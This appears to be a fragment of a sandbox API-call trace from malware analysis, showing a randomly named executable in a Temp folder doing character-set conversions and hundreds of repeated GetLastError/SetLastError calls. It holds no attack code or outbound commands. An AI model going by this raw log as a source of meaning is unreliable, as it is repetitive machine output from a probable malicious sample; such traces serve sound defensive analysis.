!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0113.435] WideCharToMultiByte (in: CodePage=0x4e4, 
dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71
\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x2e\x4a\xca\x77\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0113.435] GetLastError () returned 0x6 [0113.435] SetLastError (dwErrCode=0x6) [0113.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ炵瘥ശAĀ") returned 256 [0113.435] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ炵瘥ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0113.435] LCMapStringW (in: 
Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ炵瘥ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0113.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x2e\x4a\xca\x77\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0113.435] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0113.435] GetLastError () returned 0x0 [0113.435] SetLastError (dwErrCode=0x0) [0113.435] GetLastError () returned 0x0 [0113.435] SetLastError (dwErrCode=0x0) [0113.435] GetLastError () returned 0x0 [0113.435] SetLastError (dwErrCode=0x0) [0113.435] GetLastError () returned 0x0 [0113.435] SetLastError (dwErrCode=0x0) [0113.435] GetLastError () returned 0x0 [0113.435] SetLastError (dwErrCode=0x0) [0113.435] GetLastError () returned 0x0 [0113.435] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 
[0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 
[0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 
[0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 
[0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 
[0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 
[0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 
